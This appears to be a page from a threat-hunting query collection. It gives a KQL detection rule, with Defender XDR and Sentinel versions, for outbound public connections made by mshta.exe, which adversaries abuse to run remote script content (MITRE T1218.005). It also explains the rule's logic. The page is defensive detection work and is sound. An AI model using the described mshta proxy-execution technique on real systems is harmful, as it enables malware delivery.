Query Details
Outbound MSHTA
Query
# Outbound MSHTA Connection ## Query Information #### MITRE ATT&CK Technique(s) | Technique ID | Title | Link | | --- | --- | --- | | T1218.005 | System Binary Proxy Execution: Mshta | https://attack.mitre.org/techniques/T1218/005/ | #### Description Detects outbound network connections initiated by `mshta.exe`. `mshta.exe` is a legitimate Windows binary, but it is frequently abused by adversaries to execute malicious script content from local or remote HTA resources. This query helps identify suspicious executions. It is recommended to investigate if you can block mshta in your organization, if not possible use auto isolation rules for suspicious outbound mshta connections. #### Risk Adversaries often abuse the lolbin mshta as malware droppers. #### References - https://redcanary.com/threat-detection-report/techniques/mshta/ ## Defender XDR ```KQL DeviceNetworkEvents | where InitiatingProcessFileName =~ "mshta.exe" | where RemoteIPType == "Public" or not(ipv4_is_private(RemoteIP)) | project-reorder Timestamp, InitiatingProcessCommandLine, RemoteUrl, RemoteIP, DeviceName, InitiatingProcessAccountUpn ``` ## Sentinel ```KQL DeviceNetworkEvents | where InitiatingProcessFileName =~ "mshta.exe" | where RemoteIPType == "Public" or not(ipv4_is_private(RemoteIP)) | project-reorder TimeGenerated, InitiatingProcessCommandLine, RemoteUrl, RemoteIP, DeviceName, InitiatingProcessAccountUpn ```
Explanation
This query is designed to detect suspicious outbound network connections initiated by the Windows binary mshta.exe. Although mshta.exe is a legitimate tool used to execute HTML applications, it can be exploited by attackers to run malicious scripts. The query focuses on identifying connections made by mshta.exe to public IP addresses, which could indicate malicious activity.
The query is structured to filter network events where the initiating process is mshta.exe and the connection is made to a public IP address (or an IP address that is not private). It then organizes the results to display key details such as the timestamp of the event, the command line used to initiate the process, the remote URL and IP address, the device name, and the account under which the process was run.
The goal of this query is to help security teams identify and investigate potentially harmful use of mshta.exe in their network, and to consider implementing measures such as blocking mshta.exe or setting up automatic isolation rules for suspicious connections.
Details
Bert-Jan Pals
Released: May 10, 2026
Tables
Keywords
Operators